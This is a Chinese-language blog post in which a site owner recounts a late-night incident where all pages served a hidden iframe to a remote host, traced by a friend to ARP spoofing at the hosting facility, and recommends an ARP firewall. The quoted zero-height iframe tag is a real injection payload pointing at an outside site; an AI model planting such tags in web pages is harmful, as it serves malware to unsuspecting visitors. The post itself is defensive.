昨天晚上11點(diǎn)多了。正要睡覺,突然一個(gè)網(wǎng)友電話過來了。說網(wǎng)頁(yè)吧出問題,被掛馬了。我一聽嚇了一大跳!馬上起床!

我進(jìn)入網(wǎng)頁(yè)吧一訪問,真的掛馬了,全部網(wǎng)頁(yè)都有馬出現(xiàn)<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe> ,然后馬上登陸服務(wù)器,看源代碼,暈了。沒有發(fā)現(xiàn)有掛馬的痕跡.為了怕影響網(wǎng)頁(yè)吧的用戶,先把網(wǎng)頁(yè)吧這個(gè)網(wǎng)站停了.

馬上問QQ上的幾個(gè)做服務(wù)器的高手朋友,發(fā)現(xiàn)全部網(wǎng)頁(yè)掛了個(gè)馬,但是我打開網(wǎng)頁(yè)看源文件卻沒有,怎么回事情?后來知道網(wǎng)頁(yè)里沒有 訪問有馬,說明機(jī)房?jī)?nèi)有ARP攻擊,裝 360安全衛(wèi)士 有ARP防火墻 !

沒管了.馬上安裝360,一提示,果然是ARP攻擊,然后打開網(wǎng)頁(yè)吧訪問,郁悶.還是有木馬.馬上關(guān)閉.這里我要說一句,360的ARP簡(jiǎn)直就是垃圾,基本沒用的。千萬別用。用和沒用是一樣的!不過查出了ARP攻擊的人的網(wǎng)卡地址.

然后半夜聯(lián)系機(jī)房,告訴他們APR攻擊的網(wǎng)卡,沒用.那機(jī)房的說是新技術(shù),不會(huì)查IP.不懂,要明天.我超郁悶!

沒辦法自己繼續(xù).繼續(xù)網(wǎng)上找軟件,找到了金山arp防火墻,需要的可以去網(wǎng)頁(yè)吧下。如果你也被攻擊的話。一安裝,然后打開.沒問題了。完全防御!最重要的是這個(gè)工具免費(fèi)啊。

朋友總結(jié):這個(gè)ARP攻擊 不是代碼的問題 是服務(wù)器輸出后,經(jīng)過網(wǎng)關(guān)的時(shí)候被加了代碼 所以網(wǎng)頁(yè)里是沒有代碼的 是被別的機(jī)器冒充了網(wǎng)關(guān) 轉(zhuǎn)發(fā)修改了數(shù)據(jù)!

終于解決問題了，一看表凌晨2點(diǎn)30了.一起3個(gè)小時(shí)!驚心動(dòng)魄啊!

如果站長(zhǎng)你的站被掛馬了，而在源代碼里沒有發(fā)現(xiàn)木馬,你就應(yīng)該懷疑是不是ARP攻擊了。最直接的辦法是告訴機(jī)房,要他們撥攻擊的人的線.第二個(gè)辦法就是安裝金山arp防火墻!

金山arp防火墻下載: http://www./ruanjian/anquan/200806/6616.html
(轉(zhuǎn)文章的朋友這個(gè)金山arp防火墻下載的連接別去掉了,因?yàn)楹芏嗳硕夹枰@個(gè)軟件，第二我打字也不容易，算是給我點(diǎn)點(diǎn)流量吧)

美國(guó)快速服務(wù)器

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。